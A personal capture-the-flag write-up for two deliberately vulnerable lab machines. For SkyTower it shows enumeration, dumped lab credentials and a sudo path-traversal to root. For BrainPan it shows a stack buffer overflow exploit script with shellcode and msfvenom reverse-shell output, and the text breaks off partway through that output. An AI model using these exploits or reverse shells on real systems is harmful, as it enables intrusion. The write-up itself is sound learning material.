PRETTY_NAME=”Debian GNU/Linux 7 (wheezy)”
NAME=”Debian GNU/Linux”
VERSION_ID=”7″
VERSION=”7 (wheezy)”
ID=debian
ANSI_COLOR=”1;31″
HOME_URL=”http://www.debian.org/”
SUPPORT_URL=”http://www.debian.org/support/”
BUG_REPORT_URL=”http://bugs.debian.org/”

Kinda strange to see that mysql is not runnig:

-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 10648 812 ? Ss 17:29 0:00 init [2]
root 2 0.0 0.0 0 0 ? S 17:29 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 17:29 0:00 [ksoftirqd/0]
root 6 0.0 0.0 0 0 ? S 17:29 0:00 [migration/0]
root 7 0.0 0.0 0 0 ? S 17:29 0:00 [watchdog/0]
root 8 0.0 0.0 0 0 ? S< 17:29 0:00 [cpuset]
root 9 0.0 0.0 0 0 ? S< 17:29 0:00 [khelper]
root 10 0.0 0.0 0 0 ? S 17:29 0:00 [kdevtmpfs]
root 11 0.0 0.0 0 0 ? S< 17:29 0:00 [netns]
root 12 0.0 0.0 0 0 ? S 17:29 0:00 [sync_supers]
root 13 0.0 0.0 0 0 ? S 17:29 0:00 [bdi-default]
root 14 0.0 0.0 0 0 ? S< 17:29 0:00 [kintegrityd]
root 15 0.0 0.0 0 0 ? S< 17:29 0:00 [kblockd]
root 17 0.0 0.0 0 0 ? S 17:29 0:00 [khungtaskd]
root 18 0.0 0.0 0 0 ? S 17:29 0:00 [kswapd0]
root 19 0.0 0.0 0 0 ? SN 17:29 0:00 [ksmd]
root 20 0.0 0.0 0 0 ? S 17:29 0:00 [fsnotify_mark]
root 21 0.0 0.0 0 0 ? S< 17:29 0:00 [crypto]
root 98 0.0 0.0 0 0 ? S< 17:29 0:00 [ata_sff]
root 103 0.0 0.0 0 0 ? S 17:29 0:00 [khubd]
root 118 0.0 0.0 0 0 ? S 17:29 0:00 [scsi_eh_0]
root 119 0.0 0.0 0 0 ? S 17:29 0:00 [scsi_eh_1]
root 120 0.0 0.0 0 0 ? S 17:29 0:00 [kworker/u:1]
root 121 0.0 0.0 0 0 ? S 17:29 0:00 [scsi_eh_2]
root 122 0.0 0.0 0 0 ? S 17:29 0:00 [kworker/u:2]
root 126 0.0 0.0 0 0 ? S 17:29 0:00 [kworker/0:2]
root 153 0.0 0.0 0 0 ? S 17:29 0:00 [jbd2/sda1-8]
root 154 0.0 0.0 0 0 ? S< 17:29 0:00 [ext4-dio-unwrit]
root 297 0.0 0.2 21380 1356 ? Ss 17:29 0:00 udevd –daemon
root 396 0.0 0.2 21376 1052 ? S 17:29 0:00 udevd –daemon
root 397 0.0 0.1 21376 1008 ? S 17:29 0:00 udevd –daemon
root 415 0.0 0.0 0 0 ? S< 17:29 0:00 [kpsmoused]
root 417 0.0 0.0 0 0 ? S 17:29 0:00 [kworker/0:3]
root 1697 0.0 0.0 0 0 ? S 17:29 0:00 [flush-8:0]
root 1819 0.0 0.3 52776 1532 ? Sl 17:29 0:00 /usr/sbin/rsyslogd -c5
root 1853 0.0 0.1 4116 636 ? Ss 17:29 0:00 /usr/sbin/acpid
root 1889 0.0 1.8 154280 9464 ? Ss 17:29 0:00 /usr/sbin/apache2 -k start
root 1932 0.0 0.2 20408 1040 ? Ss 17:29 0:00 /usr/sbin/cron
www-data 1964 0.0 1.1 154304 5944 ? S 17:29 0:00 /usr/sbin/apache2 -k start
www-data 1965 0.0 1.1 154304 5944 ? S 17:29 0:00 /usr/sbin/apache2 -k start
www-data 1966 0.0 1.1 154304 5944 ? S 17:29 0:00 /usr/sbin/apache2 -k start
www-data 1967 0.0 1.1 154304 5944 ? S 17:29 0:00 /usr/sbin/apache2 -k start
www-data 1968 0.0 1.1 154304 5944 ? S 17:29 0:00 /usr/sbin/apache2 -k start
root 2015 0.0 0.5 49956 2912 ? Ss 17:29 0:00 /usr/sbin/squid3 -YC -f /etc/squid3/squid.conf
root 2090 0.0 0.1 16256 944 tty1 Ss+ 17:29 0:00 /sbin/getty 38400 tty1
root 2091 0.0 0.1 16256 944 tty2 Ss+ 17:29 0:00 /sbin/getty 38400 tty2
root 2092 0.0 0.1 16256 940 tty3 Ss+ 17:29 0:00 /sbin/getty 38400 tty3
root 2093 0.0 0.1 16256 940 tty4 Ss+ 17:29 0:00 /sbin/getty 38400 tty4
root 2094 0.0 0.1 16256 948 tty5 Ss+ 17:29 0:00 /sbin/getty 38400 tty5
root 2095 0.0 0.1 16256 944 tty6 Ss+ 17:29 0:00 /sbin/getty 38400 tty6
root 2106 0.0 0.5 9960 2576 ? Ss 17:30 0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
root 2147 0.0 0.2 49932 1212 ? Ss 17:30 0:00 /usr/sbin/sshd
proxy 2174 0.0 3.2 86988 16288 ? S 17:48 0:00 (squid) -YC -f /etc/squid3/squid.conf
proxy 2175 0.0 0.2 20100 1052 ? S 17:48 0:00 (unlinkd)
root 2176 0.0 0.6 69216 3508 ? Ss 17:48 0:00 sshd: john [priv]
john 2178 0.0 0.3 69216 1720 ? S 17:48 0:00 sshd: john@notty
john 2179 0.0 0.2 10752 1360 ? Ss 17:48 0:00 /bin/bash
john 2194 0.0 0.1 4180 640 ? S 17:56 0:00 /bin/sh -i
root 2204 0.0 0.0 0 0 ? S 18:00 0:00 [kworker/0:0]
john 2215 0.0 0.3 11332 1992 ? S 18:04 0:00 /bin/bash ./linenum.sh -t
john 2216 0.1 0.2 11356 1508 ? S 18:04 0:00 /bin/bash ./linenum.sh -t
john 2217 0.0 0.1 5596 652 ? S 18:04 0:00 tee -a
john 2439 0.0 0.2 11356 1212 ? S 18:04 0:00 /bin/bash ./linenum.sh -t
john 2440 0.0 0.2 16836 1268 ? R 18:04 0:00 ps aux

### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget

[-] SGID files:
-rwxr-sr-x 1 root shadow 54904 May 25 2012 /usr/bin/chage
-rwxr-sr-x 1 root tty 14624 Jun 11 2012 /usr/bin/bsd-write
-rwxr-sr-x 1 root tty 23056 Dec 11 2012 /usr/bin/wall
-rwxr-sr-x 1 root ssh 129088 Apr 2 2014 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 23312 May 25 2012 /usr/bin/expiry
-rwxr-sr-x 1 root crontab 35880 Jul 3 2012 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 35408 Apr 29 2012 /sbin/unix_chkpwd

TROLL:

$ cat /etc/issue
Welcome to the SkyTower, try to gain access
to the flag.txt file in the /root/ directory

OK.. going nowhere for now and no TTY so it’s painfull…
Let’s try to fix this:

ssh -t john@127.0.0.1 -p 4444 “/bin/sh”

Yeah… better!!!

But there’s something still wrong…
So let’s check the login process:

.bashrc has an exit statement.. so I deleted the file… and logged in again….

better! Now I have a real TTY..

Going back to mysql with the credentails I found (root/root)
mysql> select * from login;
+—-+———————+————–+
| id | email | password |
+—-+———————+————–+
| 1 | john@skytech.com | hereisjohn |
| 2 | sara@skytech.com | ihatethisjob |
| 3 | william@skytech.com | senseable

Trying to log in as sara and removing .bashrc in the same time in case of:

john@SkyTower:~$ ssh sara@localhost “rm .bashrc”
The authenticity of host ‘localhost (::1)’ can’t be established.
ECDSA key fingerprint is f6:3b:95:46:6e:a7:0f:72:1a:67:9e:9b:8a:48:5e:3d.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/john/.ssh/known_hosts).
sara@localhost’s password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

sudo -l
Matching Defaults entries for sara on this host:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:
(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*

sara@SkyTower:~$ sudo ls /accounts/../root
flag.txt
sara@SkyTower:~$ sudo cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower

Then…easy:

su –
Password:
root@SkyTower:~# whoami
root

This one was not like the other machine….. I found it tricky!!!!!!!!

BrainPan

This one was really fun….. a mix of Windows and Linux….. And my first attempt to overflow a Windows binary from a Linux machine.

nmap -sC -sV -oA brainpan.nmap 192.168.1.149
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-23 15:28 UTC
Nmap scan report for brainpan.lan (192.168.1.149)
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
9999/tcp open abyss?
| fingerprint-strings:
| NULL:
| _| _|
| _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
| _|_| _| _| _| _| _| _| _| _| _| _| _|
| _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
| [________________________ WELCOME TO BRAINPAN _________________________]
|_ ENTER THE PASSWORD
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-title: Site doesn’t have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.70%I=7%D=8/23%Time=5D600619%P=x86_64-pc-linux-gnu%r(NU
SF:LL,298,”_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|
SF:\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\
SF:x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x
SF:20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|
SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x
SF:20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x
SF:20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x
SF:20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_
SF:\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x
SF:20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x
SF:20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x
SF:20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20>>\x20″);
MAC Address: 94:65:9C:41:A0:D7 (Intel Corporate)

On port 10000 I see a website:

file:///tmp/tmphBGARS/1.png
file:///tmp/tmphBGARS/1.png

Trying to enumerate the website with dirbuster….

dirbuster -l /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://192.168.1.149 >brainpan.dirb

In the meantime, I started a netcat against port 9999:

root@kali:~/boxes/brainpan# nc 192.168.1.149 9999
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|

[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD

>> test
ACCESS DENIED
root@kali:~/boxes/brainpan#

Dirbuster found a /bin directory:

file:///tmp/tmphBGARS/2.png

I downloaded the file and now trying to see what it is:

file brainpan.exe
brainpan.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows

OK so we have a win32 binary…

Did a cat on it and found this:

[get_reply] copied %d bytes to buffer
shitstorm

_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|

[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD

>> ACCESS DENIED
ACCESS GRANTED

So tried it on the website: Nothing.. Cannot get it to pass the login.
Maybe with netcat:

file:///tmp/tmphBGARS/3.png

So I can login but then nothing.

I tried to add an argument when calling the target, and I have an odd message:

root@kali:~# netcat 192.168.1.149 9999 $(python -c “print ‘shitstorm'”)
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|

[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD

>> shitstorm
ACCESS GRANTEDinvalid port shitstorm

Interesting… So maybe I can open a new port:

netcat 192.168.1.149 9999 80
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|

[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD

>> shitstorm
ACCESS GRANTEDroot@kali:~#

But then when I try to open a webpage on port 80, no response.
Maybe it openned something different.. Let’s nmap it:

nc -v 192.168.1.149 80
brainpan.lan [192.168.1.149] 80 (http) : Connection refused

So I don’t have an error message but no new connection is detected.

I tried port 21.. same thing. No error but nothing happens.

So let’s try all of them:

In list.txt, I have the password: shitstorm

Then I created knock.sh:

#!/bin/bash

i=”0″
while [ $i -lt 65535 ]
do
echo $i
nc 192.168.1.149 9999 < list.txt $i
i=$[$i+1]
done

Executed it and re run nmap:

Didn’t do anything!!!!

So I tried to diassemble it using radare2:

Found this:
section..rdata ; [02] -r– section size 4096 named .rdata

Maybe it can be overflowed…

Nope…

But I also saw this:

str.ACCESS_GRANTED
0x31173319 2020 2020 2020 2020 2020 2020 2020 20
0x31173328 2020 2020 2020 4143 4345 5353 2047 52 ACCESS GR
0x31173337 414e 5445 440a 005b 2b5d 2069 6e69 74 ANTED..[+] init ; str.initializing_winsock…
0x31173346 6961 6c69 7a69 6e67 2077 696e 736f 63 ializing winsoc
0x31173355 6b2e 2e2e 005b 215d 2077 696e 736f 63 k….[!] winsoc ; str.winsock_init_failed:__d
0x31173364 6b20 696e 6974 2066 6169 6c65 643a 20 k init failed:
0x31173373 2564 0064 6f6e 652e 0a00 0000 005b 21 %d.done……[! ; str.done. ; str.could_not_create_socket:__d
0x31173382 5d20 636f 756c 6420 6e6f 7420 6372 65 ] could not cre
0x31173391 6174 6520 736f 636b 6574 3a20 2564 00 ate socket: %d.

0x311733a0 5b2b 5d20 7365 7276 6572 2073 6f63 6b [+] server sock ; str.server_socket_created.

0x311733af 6574 2063 7265 6174 6564 2e0a 005b 21 et created…[! ; str.bind_failed:__d
0x311733be 5d20 6269 6e64 2066 6169 6c65 643a 20 ] bind failed:
0x311733cd 2564 005b 2b5d 2062 696e 6420 646f 6e %d.[+] bind don ; str.bind_done_on_port__d
0x311733dc 6520 6f6e 2070 6f72 7420 2564 0a00 5b e on port %d..[ ; str.waiting_for_connections.
0x311733eb 2b5d 2077 6169 7469 6e67 2066 6f72 20 +] waiting for
0x311733fa 636f 6e6e 6563 7469 6f6e 732e 0a00 5b connections…[ ; str.received_connection.
0x31173409 2b5d 2072 6563 6569 7665 6420 636f 6e +] received con
0x31173418 6e65 6374 696f 6e2e 0a00 5b2b 5d20 63 nection…[+] c ; str.check_is__d
0x31173427 6865 636b 2069 7320 2564 0a00 5b21 5d heck is %d..[!] ; str.accept_failed:__d
0x31173436 2061 6363 6570 7420 6661 696c 6564 3a accept failed:
0x31173445 2025 6400 5b2b 5d20 636c 6561 6e69 6e %d.[+] cleanin ; str.cleaning_up.
0x31173454 6720 7570 2e0a 0000 0000 0000 2d4c 49 g up……..-LI ; str.LIBGCCW32_EH_3_SJLJ_GTHR_MINGW32
0x31173463 4247 4343 5733 322d 4548 2d33 2d53 4a BGCCW32-EH-3-SJ
0x31173472 4c4a 2d47 5448 522d 4d49 4e47 5733 32 LJ-GTHR-MINGW32
0x31173481 0000 0077 3332 5f73 6861 7265 6470 74 …w32_sharedpt ; str.w32_sharedptr__size____sizeof_W32_EH_SHARED

So my first idea should have worked… Weird

/Trying differently:

Running brainpan.exe using wine:

wine brainpan.exe
[+] initializing winsock…done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.

Then pushing a file with 3000 “A”:

nc 192.168.1.123 9999 < overflow
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|

[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD

[+] received connection.
[get_reply] s = [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx■C]
[get_reply] copied 1003 bytes to buffer
wine: Unhandled page fault on read access to 0x41414141 at address 0x41414141 (thread 0009), starting debugger…
0009:err:seh:start_debugger Couldn’t start debugger (“winedbg –auto 8 48”) (2)
Read the Wine Developers Guide on how to set up winedbg or another debugger

CRASH… We can overflow it!

So I ran it with winedbg:

Unhandled exception: page fault on read access to 0x41414141 in 32-bit code (0x41414141).
Register dump:
CS:0023 SS:002b DS:002b ES:002b FS:006b GS:0063
EIP:41414141 ESP:0043f860 EBP:41414141 EFLAGS:00010202( R- — I – – – )
EAX:ffffffff EBX:7b63ee08 ECX:0043f640 EDX:0043f650
ESI:7b63ee08 EDI:00000000
Stack dump:
0x0043f860: 41414141 41414141 41414141 41414141
0x0043f870: 41414141 41414141 41414141 41414141
0x0043f880: 41414141 41414141 41414141 41414141
0x0043f890: 41414141 41414141 41414141 41414141
0x0043f8a0: 41414141 41414141 41414141 41414141
0x0043f8b0: 41414141 41414141 41414141 41414141

We overwrote EIP. So let’s find where it breaks:

First we create a unique pattern:

msf-pattern_create -l 1200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9

Then inject it:

It crashes again:

Unhandled exception: page fault on read access to 0x35724134 in 32-bit code (0x35724134).
Register dump:
CS:0023 SS:002b DS:002b ES:002b FS:006b GS:0063
EIP:35724134 ESP:0042f860 EBP:72413372 EFLAGS:00010202( R- — I – – – )
EAX:ffffffff EBX:7b63ee08 ECX:0042f640 EDX:0042f650
ESI:7b63ee08 EDI:00000000
Stack dump:
0x0042f860: 41367241 72413772 39724138 41307341
0x0042f870: 73413173 33734132 41347341 73413573
0x0042f880: 37734136 41387341 74413973 31744130
0x0042f890: 41327441 74413374 35744134 41367441
0x0042f8a0: 74413774 39744138 41307541 75413175
0x0042f8b0: 33754132 41347541 75413575 37754136
Backtrace:
=>0 0x35724134 (0x72413372)
0x35724134: — no code accessible —
Modules:
Module Address Debug info Name (5 modules)
PE 31170000-31176000 Deferred brainpan
PE 7b420000-7b5d1000 Deferred kernel32
PE 7bc10000-7bc14000 Deferred ntdll
PE 7faf0000-7faf4000 Deferred ws2_32
PE 7fb30000-7fb34000 Deferred msvcrt

Now finding the offset:

msf-pattern_offset -q 35724134
[*] Exact match at offset 524

We have our payload length!

Let’s start working on the exploit:

import struct
pad = “\x41” *524
EIP = struct.pack(“I”,0xffffdd34)
shellcode = “\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80”
NOP = “\x90” * 1000
print pad + EIP + NOP + shellcode

Found the JMP ESP with Ollydbg:

file:///tmp/tmphBGARS/4.png

311712F3

#!/usr/bin/python
import socket
import struct
server = ‘192.168.1.149’
sport = 9999

pad = “\x41” *524
EIP = struct.pack(“I”,0x311712F3)
shellcode = “\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80”
NOP = “\x90” * 1000
exploit = pad + EIP + NOP + shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print “Sending attack ”
s.send((‘shitstorm .’ + exploit + ‘\r\n’))
print s.recv(1024)
s.close()

Now generating the real paylod:

msfvenom -p windows/shell_reverse_tcp LPORT=4444 LHOST=192.168.1.123 -b “\x00” -e x86/shikata_ga_nai -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] =
“\xda\xdf\xd9\x74\x24\xf4\xbb\xb9\xcc\xed\x34\x5d\x29\xc9\xb1”
“\x52\x31\x5d\x17\x03\x5d\x17\x83\x7c\xc8\x0f\xc1\x82\x39\x4d”
“\x2a\x7a\xba\x32\xa2\x9f\x8b\x72\xd0\xd4\xbc\x42\x92\xb8\x30”
“\x28\xf6\x28\xc2\x5c\xdf\x5f\x63\xea\x39\x6e\x74\x47\x79\xf1”
“\xf6\x9a\xae\xd1\xc7\x54\xa3\x10\x0f\x88\x4e\x40\xd8\xc6\xfd”
“\x74\x6d\x92\x3d\xff\x3d\x32\x46\x1c\xf5\x35\x67\xb3\x8d\x6f”
“\xa7\x32\x41\x04\xee\x2c\x86\x21\xb8\xc7\x7c\xdd\x3b\x01\x4d”
“\x1e\x97\x6c\x61\xed\xe9\xa9\x46\x0e\x9c\xc3\xb4\xb3\xa7\x10”
“\xc6\x6f\x2d\x82\x60\xfb\x95\x6e\x90\x28\x43\xe5\x9e\x85\x07”
“\xa1\x82\x18\xcb\xda\xbf\x91\xea\x0c\x36\xe1\xc8\x88\x12\xb1”
“\x71\x89\xfe\x14\x8d\xc9\xa0\xc9\x2b\x82\x4d\x1d\x46\xc9\x19”
“\xd2\x6b\xf1\xd9\x7c\xfb\x82\xeb\x23\x57\x0c\x40\xab\x71\xcb”
“\xa7\x86\xc6\x43\x56\x29\x37\x4a\x9d\x7d\x67\xe4\x34\xfe\xec”
